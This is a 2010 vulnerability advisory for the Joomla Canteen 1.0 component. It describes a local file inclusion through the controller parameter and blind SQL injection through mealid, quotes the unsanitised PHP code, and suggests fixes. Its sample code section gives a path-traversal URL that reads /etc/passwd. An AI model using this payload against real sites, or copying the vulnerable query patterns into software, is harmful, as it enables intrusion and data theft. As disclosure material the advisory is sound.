Joomla Canteen 1.0 SQL Injection / Local File Inclusion

`Canteen Joomla Component 1.0 Multiple Remote Vulnerabilities  
  
Name Canteen  
Vendor http://www.miniwork.eu  
Versions Affected 1.0  
  
Author Salvatore Fresta aka Drosophila  
Website http://www.salvatorefresta.net  
Contact salvatorefresta [at] gmail [dot] com  
Date 2010-04-07  
  
X. INDEX  
  
I. ABOUT THE APPLICATION  
II. DESCRIPTION  
III. ANALYSIS  
IV. SAMPLE CODE  
V. FIX  
  
  
I. ABOUT THE APPLICATION  
  
Canteen is a Joomla 1.5 component.  
This component is written for canteens. You can easily   
manage daily menu with this component.  
  
  
II. DESCRIPTION  
  
Some parameters are not sanitised before being used in  
SQL queries and in danger PHP's functions.  
  
  
III. ANALYSIS  
  
Summary:  
  
A) Local File Inclusion  
B) Multiple Blind SQL Injection  
  
  
A) Local File Inclusion  
  
The controller parameter in canteen.php is not sanitised  
before being used in the PHP function's require_once().  
This allows a guest to include local files. The following  
is the affected code:  
  
if($controller = JRequest::getVar('controller')) {  
require_once (JPATH_COMPONENT.DS.'controllers'.DS.$controller.'.php');  
}  
  
  
B) Multiple Blind SQL Injection  
  
The meailid parameter in menu.php is not properly  
before being used in multiple SQL queries. This can be  
exploited to manipulate SQL queries by injecting  
arbitrary SQL code. The following is the affected code:  
  
  
$mealid = JRequest::getVar('mealid');  
$SQLQuery = "INSERT INTO #__miniwork_canteen_order (jo_userid, jo_mealid, jo_created, jo_createdby, jo_changed, jo_changedby)  
VALUES (".$user->id.", ".$mealid.", NOW(), '".$user->sSecondName." ".$user->sFirstName."', NOW(), '".$user->sSecondName." ".$user->sFirstName."')";  
  
  
$mealid = JRequest::getVar('mealid');  
$SQLQuery = "DELETE FROM #__miniwork_canteen_order WHERE jo_mealid = ".$mealid." AND jo_userid = ".$orduser->id.";";  
  
  
$mealid = JRequest::getVar('mealid');  
$SQLQuery = "UPDATE #__miniwork_canteen_order SET jo_userid = ".$orduser->id.", jo_changed=NOW(), jo_changedby='".$orduser->sSecondName." ".$orduser->sFirstName."' WHERE jo_mealid=".$mealid." AND jo_userid is null LIMIT 1;";   
  
  
IV. SAMPLE CODE  
  
A) Local File Inclusion  
  
http://site/path/index.php?option=com_canteen&controller=../../../../../etc/passwd%00  
  
  
V. FIX  
  
Checking for path traversal sequence and useing of PHP  
function's intval() for integer values.  
  
`